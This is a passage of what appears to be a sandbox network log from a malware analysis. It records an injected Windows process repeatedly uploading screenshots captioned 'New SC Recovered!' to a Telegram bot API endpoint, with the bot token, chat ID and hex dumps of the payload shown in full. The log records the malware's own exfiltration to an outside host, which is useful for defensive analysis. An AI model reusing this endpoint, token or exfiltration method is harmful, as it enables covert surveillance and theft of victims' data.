                                                        Host: api.telegram.org
                                                        Content-Length: 76460
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:25:11 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:25:11 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 37 31 33 30 64 64 62 30 66 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 37 31 33 30 64 64 62 30 66 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 30 37 2f 32 30 32 34 20 32 32 3a 35 31 3a 30 39 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd17130ddb0f75Content-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd17130ddb0f75Content-Disposition: form-data; name="caption"New SC Recovered!Time: 12/07/2024 22:51:09User
                                                        2024-10-30 15:25:11 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:25:11 UTC16355OUTData Raw: 31 8a 95 2e 66 b5 4c cb a2 8a 2b d7 3c 10 a4 a5 a2 80 2e 68 df f2 18 b4 ff 00 ae 82 bd 02 bc ff 00 47 ff 00 90 bd a7 fd 75 5f e7 5d 46 af 7f 73 f6 a8 b4 cd 3f 02 ee 61 b9 a4 3d 22 4f 5a f2 71 b1 73 ac 92 ed fe 67 bb 97 4d 42 83 6f bf e8 8d 8a ab 7a db 04 2e 55 99 56 4e 76 a9 6f e1 61 d0 7d 6b 24 f8 6f 4d 00 35 fc f2 5c 4c dd 64 96 52 32 7d a9 92 cb 67 e1 82 c0 5c 5c cf e6 0c a5 b1 6d c1 40 ea 7d ab 97 d9 46 5a 41 dd fa 1d fe d6 51 d6 6a cb d4 cb d6 ec e1 8d fe d1 6e ae 88 c7 95 68 d9 40 3e d9 15 93 5d 6f 89 66 8e e3 42 86 68 9b 72 49 22 b2 9f 62 0d 72 55 ea 60 a5 29 53 b4 ba 3b 1e 1e 63 08 c6 b5 e3 d5 5c 29 05 2d 15 d8 70 09 45 2d 25 00 14 51 45 00 14 94 b4 50 01 49 4b 45 03 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 96 92 98 05 14 51 40 05 25 2d 25 03 0a
                                                        Data Ascii: 1.fL+<.hGu_]Fs?a="OZqsgMBoz.UVNvoa}k$oM5\LdR2}g\\m@}FZAQjnh@>]ofBhrI"brU`)S;c\)-pE-%QEPIKE(((Q@%-%
                                                        2024-10-30 15:25:11 UTC16355OUTData Raw: 61 54 b1 fd 05 15 0c ac b1 cd 14 92 12 b1 e1 d1 d8 2e ed a1 d0 ae 71 df 19 cd 3a ae 51 83 71 dc 54 23 19 54 8c 67 b1 25 a3 7d b1 ad d6 26 8c 19 dd e3 5d cc 47 2a bb 8e 78 f4 a7 5b 86 b8 f3 42 6d 53 0c 6f 23 ef 38 da 17 af e3 59 11 49 15 98 b3 b7 59 d6 75 41 72 f2 4b 1a 3e d0 cf 16 c5 51 90 0f 6e 78 ef 4b 1e a4 37 43 23 09 11 e7 8a 57 bc 25 49 1e 67 94 c8 a0 63 d4 92 c7 fd ef 6a f3 a5 8a aa af 65 d3 43 d8 8e 02 83 e5 bc bd 75 34 e5 6f 26 3b 79 1c ae db 88 56 64 da 73 90 46 71 f5 e4 7e 75 25 c2 2d ac d7 11 dd 5c db c1 f6 7f 2f 7b 33 31 19 70 4a 8f 95 4f a1 ac 74 d4 51 63 4f 96 47 36 d6 d0 bd b6 14 e3 cf 58 c2 32 9c f6 c8 53 e9 f2 7b d3 e2 bc 0f 0c e8 97 56 f0 ce d1 59 8d d7 76 c6 55 26 34 21 f8 d8 dc 82 47 38 fa 1a 1e 2a af 44 54 70 18 7b b6 df e2 6a 0d 8a
                                                        Data Ascii: aT.q:QqT#Tg%}&]G*x[BmSo#8YIYuArK>QnxK7C#W%IgcjeCu4o&;yVdsFq~u%-\/{31pJOtQcOG6X2S{VYvU&4!G8*DTp{j
                                                        2024-10-30 15:25:11 UTC15447OUTData Raw: 14 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 94 b4 94 0c 28 a2 8a 60 14 94 b4 94 00 51 45 14 0c 29 29 68 a4 02 51 45 14 c6 14 51 45 00 25 14 51 40 05 14 51 40 09 45 2e 29 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 30 a2 8a 28 00 a2 92 8a 00 53 49 45 14 0c 28 a3 34 94 00 b4 9c 51 45 31 86 4a f4 24 7d 0d 48 b3 cc bd 24 6f ce a2 a3 34 5a e0 59 17 b3 8e a5 4f d4 54 82 ff 00 fb f0 21 aa 24 d1 9a 39 10 58 d1 5b bb 63 f7 a2 71 f4 35 22 cb 66 df f2 d9 97 fd e5 ac 9d e0 53 4c 9e 82 93 a6 bb 87 25 cd d5 8e 27 ff 00 57 73 19 fc 6a c4 36 ed 10 91 8b 29 1e 59 e4 1a e5 d9 cd 20 96 45 ce 1d 87 d0 d6 72 a6 de 97 0f 64 df 51 1b a9 e9 4d fa d2 e7 34 95 a9 ba 42 50 68 fc 69 28 28 4a 3f 2a 3a 51 40 c3 f1 a4 e9 4b 49 f4 a4 01 f5 a3 34 52 50 30 fc a9 28 a2 81 87
                                                        Data Ascii: QE)(JZJQE(`QE))hQEQE%Q@Q@E.)(QERPEP0(SIE(4QE1J$}H$o4ZYOT!$9X[cq5"fSL%'Wsj6)Y ErdQM4BPhi((J?*:Q@KI4RP0(
                                                        2024-10-30 15:25:11 UTC10874OUTData Raw: 5e b6 17 f8 31 fe ba 9f 37 98 7f bc cb e5 f9 21 28 a5 a4 ae 93 88 5a a0 97 3f 63 d7 a2 b9 cf 11 48 8c 7e 9c 67 f4 ab f5 4a e6 cb cd 95 a5 f3 31 9e d8 a8 95 ac ee 75 61 26 a1 52 ec ea 2f 75 5b 1b 5d 7f 4d 8e de e6 17 b6 2f 2b cc ca e0 ae 64 27 a9 e9 c5 60 78 b2 e2 de 4d 42 0b 6b 39 16 4b 6b 58 16 24 64 60 c0 fe 23 f0 fc ab 5f fe 10 2f fa 89 ff 00 e4 0f fe ca 94 78 08 64 67 53 24 77 c4 1f fd 95 70 42 a5 08 34 f9 b6 3d f9 46 ac 95 ac 6f 5e 9b d1 74 fe 4a ea 45 38 c7 93 f6 6d 9d 3b 6f f9 bf 3a 93 4e 37 66 76 f3 d6 fc 2e de 3e d1 e4 6d ce 47 fc f3 e7 3f a5 68 d1 5e 7f 3e 96 b1 d7 cb ad cf 36 5f ba 3e 94 b4 8b f7 47 d2 96 bd f8 7c 28 f8 ea 9f 1b f5 0a 28 a2 ac 80 ae 93 c1 7f f2 0d ba ff 00 af a7 fe 4b 5c dd 74 9e 0b ff 00 90 6d d7 fd 7d 3f f2 5a f2 f3 1f b1 f3
                                                        Data Ascii: ^17!(Z?cH~gJ1ua&R/u[]M/+d'`xMBk9KkX$d`#_/xdgS$wpB4=Fo^tJE8m;o:N7fv.>mG?h^>6_>G|((K\tm}?Z
                                                        2024-10-30 15:25:11 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 37 31 33 30 64 64 62 30 66 37 35 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd17130ddb0f75--
                                                        2024-10-30 15:25:11 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:25:11 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.450008149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:25:13 UTC262OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd19dfeeb9adba
                                                        Host: api.telegram.org
                                                        Content-Length: 76460
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:25:13 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:25:13 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 39 64 66 65 65 62 39 61 64 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 39 64 66 65 65 62 39 61 64 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 31 31 2f 32 30 32 34 20 31 32 3a 33 32 3a 35 31 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd19dfeeb9adbaContent-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd19dfeeb9adbaContent-Disposition: form-data; name="caption"New SC Recovered!Time: 12/11/2024 12:32:51User
                                                        2024-10-30 15:25:13 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:25:13 UTC16355OUTData Raw: 31 8a 95 2e 66 b5 4c cb a2 8a 2b d7 3c 10 a4 a5 a2 80 2e 68 df f2 18 b4 ff 00 ae 82 bd 02 bc ff 00 47 ff 00 90 bd a7 fd 75 5f e7 5d 46 af 7f 73 f6 a8 b4 cd 3f 02 ee 61 b9 a4 3d 22 4f 5a f2 71 b1 73 ac 92 ed fe 67 bb 97 4d 42 83 6f bf e8 8d 8a ab 7a db 04 2e 55 99 56 4e 76 a9 6f e1 61 d0 7d 6b 24 f8 6f 4d 00 35 fc f2 5c 4c dd 64 96 52 32 7d a9 92 cb 67 e1 82 c0 5c 5c cf e6 0c a5 b1 6d c1 40 ea 7d ab 97 d9 46 5a 41 dd fa 1d fe d6 51 d6 6a cb d4 cb d6 ec e1 8d fe d1 6e ae 88 c7 95 68 d9 40 3e d9 15 93 5d 6f 89 66 8e e3 42 86 68 9b 72 49 22 b2 9f 62 0d 72 55 ea 60 a5 29 53 b4 ba 3b 1e 1e 63 08 c6 b5 e3 d5 5c 29 05 2d 15 d8 70 09 45 2d 25 00 14 51 45 00 14 94 b4 50 01 49 4b 45 03 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 96 92 98 05 14 51 40 05 25 2d 25 03 0a
                                                        Data Ascii: 1.fL+<.hGu_]Fs?a="OZqsgMBoz.UVNvoa}k$oM5\LdR2}g\\m@}FZAQjnh@>]ofBhrI"brU`)S;c\)-pE-%QEPIKE(((Q@%-%
                                                        2024-10-30 15:25:13 UTC16355OUTData Raw: 61 54 b1 fd 05 15 0c ac b1 cd 14 92 12 b1 e1 d1 d8 2e ed a1 d0 ae 71 df 19 cd 3a ae 51 83 71 dc 54 23 19 54 8c 67 b1 25 a3 7d b1 ad d6 26 8c 19 dd e3 5d cc 47 2a bb 8e 78 f4 a7 5b 86 b8 f3 42 6d 53 0c 6f 23 ef 38 da 17 af e3 59 11 49 15 98 b3 b7 59 d6 75 41 72 f2 4b 1a 3e d0 cf 16 c5 51 90 0f 6e 78 ef 4b 1e a4 37 43 23 09 11 e7 8a 57 bc 25 49 1e 67 94 c8 a0 63 d4 92 c7 fd ef 6a f3 a5 8a aa af 65 d3 43 d8 8e 02 83 e5 bc bd 75 34 e5 6f 26 3b 79 1c ae db 88 56 64 da 73 90 46 71 f5 e4 7e 75 25 c2 2d ac d7 11 dd 5c db c1 f6 7f 2f 7b 33 31 19 70 4a 8f 95 4f a1 ac 74 d4 51 63 4f 96 47 36 d6 d0 bd b6 14 e3 cf 58 c2 32 9c f6 c8 53 e9 f2 7b d3 e2 bc 0f 0c e8 97 56 f0 ce d1 59 8d d7 76 c6 55 26 34 21 f8 d8 dc 82 47 38 fa 1a 1e 2a af 44 54 70 18 7b b6 df e2 6a 0d 8a
                                                        Data Ascii: aT.q:QqT#Tg%}&]G*x[BmSo#8YIYuArK>QnxK7C#W%IgcjeCu4o&;yVdsFq~u%-\/{31pJOtQcOG6X2S{VYvU&4!G8*DTp{j
                                                        2024-10-30 15:25:13 UTC15447OUTData Raw: 14 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 94 b4 94 0c 28 a2 8a 60 14 94 b4 94 00 51 45 14 0c 29 29 68 a4 02 51 45 14 c6 14 51 45 00 25 14 51 40 05 14 51 40 09 45 2e 29 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 30 a2 8a 28 00 a2 92 8a 00 53 49 45 14 0c 28 a3 34 94 00 b4 9c 51 45 31 86 4a f4 24 7d 0d 48 b3 cc bd 24 6f ce a2 a3 34 5a e0 59 17 b3 8e a5 4f d4 54 82 ff 00 fb f0 21 aa 24 d1 9a 39 10 58 d1 5b bb 63 f7 a2 71 f4 35 22 cb 66 df f2 d9 97 fd e5 ac 9d e0 53 4c 9e 82 93 a6 bb 87 25 cd d5 8e 27 ff 00 57 73 19 fc 6a c4 36 ed 10 91 8b 29 1e 59 e4 1a e5 d9 cd 20 96 45 ce 1d 87 d0 d6 72 a6 de 97 0f 64 df 51 1b a9 e9 4d fa d2 e7 34 95 a9 ba 42 50 68 fc 69 28 28 4a 3f 2a 3a 51 40 c3 f1 a4 e9 4b 49 f4 a4 01 f5 a3 34 52 50 30 fc a9 28 a2 81 87
                                                        Data Ascii: QE)(JZJQE(`QE))hQEQE%Q@Q@E.)(QERPEP0(SIE(4QE1J$}H$o4ZYOT!$9X[cq5"fSL%'Wsj6)Y ErdQM4BPhi((J?*:Q@KI4RP0(
                                                        2024-10-30 15:25:13 UTC10874OUTData Raw: 5e b6 17 f8 31 fe ba 9f 37 98 7f bc cb e5 f9 21 28 a5 a4 ae 93 88 5a a0 97 3f 63 d7 a2 b9 cf 11 48 8c 7e 9c 67 f4 ab f5 4a e6 cb cd 95 a5 f3 31 9e d8 a8 95 ac ee 75 61 26 a1 52 ec ea 2f 75 5b 1b 5d 7f 4d 8e de e6 17 b6 2f 2b cc ca e0 ae 64 27 a9 e9 c5 60 78 b2 e2 de 4d 42 0b 6b 39 16 4b 6b 58 16 24 64 60 c0 fe 23 f0 fc ab 5f fe 10 2f fa 89 ff 00 e4 0f fe ca 94 78 08 64 67 53 24 77 c4 1f fd 95 70 42 a5 08 34 f9 b6 3d f9 46 ac 95 ac 6f 5e 9b d1 74 fe 4a ea 45 38 c7 93 f6 6d 9d 3b 6f f9 bf 3a 93 4e 37 66 76 f3 d6 fc 2e de 3e d1 e4 6d ce 47 fc f3 e7 3f a5 68 d1 5e 7f 3e 96 b1 d7 cb ad cf 36 5f ba 3e 94 b4 8b f7 47 d2 96 bd f8 7c 28 f8 ea 9f 1b f5 0a 28 a2 ac 80 ae 93 c1 7f f2 0d ba ff 00 af a7 fe 4b 5c dd 74 9e 0b ff 00 90 6d d7 fd 7d 3f f2 5a f2 f3 1f b1 f3
                                                        Data Ascii: ^17!(Z?cH~gJ1ua&R/u[]M/+d'`xMBk9KkX$d`#_/xdgS$wpB4=Fo^tJE8m;o:N7fv.>mG?h^>6_>G|((K\tm}?Z
                                                        2024-10-30 15:25:13 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 39 64 66 65 65 62 39 61 64 62 61 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd19dfeeb9adba--
                                                        2024-10-30 15:25:14 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:25:14 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.450010149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:25:22 UTC262OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd205e132b7c54
                                                        Host: api.telegram.org
                                                        Content-Length: 76509
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:25:22 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:25:22 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 35 65 31 33 32 62 37 63 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 35 65 31 33 32 62 37 63 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 31 39 2f 32 30 32 34 20 31 38 3a 34 30 3a 35 31 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd205e132b7c54Content-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd205e132b7c54Content-Disposition: form-data; name="caption"New SC Recovered!Time: 12/19/2024 18:40:51User
                                                        2024-10-30 15:25:22 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:25:22 UTC16355OUTData Raw: 31 8a 95 2e 66 b5 4c cb a2 8a 2b d7 3c 10 a4 a5 a2 80 2e 68 df f2 18 b4 ff 00 ae 82 bd 02 bc ff 00 47 ff 00 90 bd a7 fd 75 5f e7 5d 46 af 7f 73 f6 a8 b4 cd 3f 02 ee 61 b9 a4 3d 22 4f 5a f2 71 b1 73 ac 92 ed fe 67 bb 97 4d 42 83 6f bf e8 8d 8a ab 7a db 04 2e 55 99 56 4e 76 a9 6f e1 61 d0 7d 6b 24 f8 6f 4d 00 35 fc f2 5c 4c dd 64 96 52 32 7d a9 92 cb 67 e1 82 c0 5c 5c cf e6 0c a5 b1 6d c1 40 ea 7d ab 97 d9 46 5a 41 dd fa 1d fe d6 51 d6 6a cb d4 cb d6 ec e1 8d fe d1 6e ae 88 c7 95 68 d9 40 3e d9 15 93 5d 6f 89 66 8e e3 42 86 68 9b 72 49 22 b2 9f 62 0d 72 55 ea 60 a5 29 53 b4 ba 3b 1e 1e 63 08 c6 b5 e3 d5 5c 29 05 2d 15 d8 70 09 45 2d 25 00 14 51 45 00 14 94 b4 50 01 49 4b 45 03 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 96 92 98 05 14 51 40 05 25 2d 25 03 0a
                                                        Data Ascii: 1.fL+<.hGu_]Fs?a="OZqsgMBoz.UVNvoa}k$oM5\LdR2}g\\m@}FZAQjnh@>]ofBhrI"brU`)S;c\)-pE-%QEPIKE(((Q@%-%
                                                        2024-10-30 15:25:22 UTC16355OUTData Raw: 61 54 b1 fd 05 15 0c ac b1 cd 14 92 12 b1 e1 d1 d8 2e ed a1 d0 ae 71 df 19 cd 3a ae 51 83 71 dc 54 23 19 54 8c 67 b1 25 a3 7d b1 ad d6 26 8c 19 dd e3 5d cc 47 2a bb 8e 78 f4 a7 5b 86 b8 f3 42 6d 53 0c 6f 23 ef 38 da 17 af e3 59 11 49 15 98 b3 b7 59 d6 75 41 72 f2 4b 1a 3e d0 cf 16 c5 51 90 0f 6e 78 ef 4b 1e a4 37 43 23 09 11 e7 8a 57 bc 25 49 1e 67 94 c8 a0 63 d4 92 c7 fd ef 6a f3 a5 8a aa af 65 d3 43 d8 8e 02 83 e5 bc bd 75 34 e5 6f 26 3b 79 1c ae db 88 56 64 da 73 90 46 71 f5 e4 7e 75 25 c2 2d ac d7 11 dd 5c db c1 f6 7f 2f 7b 33 31 19 70 4a 8f 95 4f a1 ac 74 d4 51 63 4f 96 47 36 d6 d0 bd b6 14 e3 cf 58 c2 32 9c f6 c8 53 e9 f2 7b d3 e2 bc 0f 0c e8 97 56 f0 ce d1 59 8d d7 76 c6 55 26 34 21 f8 d8 dc 82 47 38 fa 1a 1e 2a af 44 54 70 18 7b b6 df e2 6a 0d 8a
                                                        Data Ascii: aT.q:QqT#Tg%}&]G*x[BmSo#8YIYuArK>QnxK7C#W%IgcjeCu4o&;yVdsFq~u%-\/{31pJOtQcOG6X2S{VYvU&4!G8*DTp{j
                                                        2024-10-30 15:25:22 UTC15447OUTData Raw: 14 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 94 b4 94 0c 28 a2 8a 60 14 94 b4 94 00 51 45 14 0c 29 29 68 a4 02 51 45 14 c6 14 51 45 00 25 14 51 40 05 14 51 40 09 45 2e 29 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 30 a2 8a 28 00 a2 92 8a 00 53 49 45 14 0c 28 a3 34 94 00 b4 9c 51 45 31 86 4a f4 24 7d 0d 48 b3 cc bd 24 6f ce a2 a3 34 5a e0 59 17 b3 8e a5 4f d4 54 82 ff 00 fb f0 21 aa 24 d1 9a 39 10 58 d1 5b bb 63 f7 a2 71 f4 35 22 cb 66 df f2 d9 97 fd e5 ac 9d e0 53 4c 9e 82 93 a6 bb 87 25 cd d5 8e 27 ff 00 57 73 19 fc 6a c4 36 ed 10 91 8b 29 1e 59 e4 1a e5 d9 cd 20 96 45 ce 1d 87 d0 d6 72 a6 de 97 0f 64 df 51 1b a9 e9 4d fa d2 e7 34 95 a9 ba 42 50 68 fc 69 28 28 4a 3f 2a 3a 51 40 c3 f1 a4 e9 4b 49 f4 a4 01 f5 a3 34 52 50 30 fc a9 28 a2 81 87
                                                        Data Ascii: QE)(JZJQE(`QE))hQEQE%Q@Q@E.)(QERPEP0(SIE(4QE1J$}H$o4ZYOT!$9X[cq5"fSL%'Wsj6)Y ErdQM4BPhi((J?*:Q@KI4RP0(
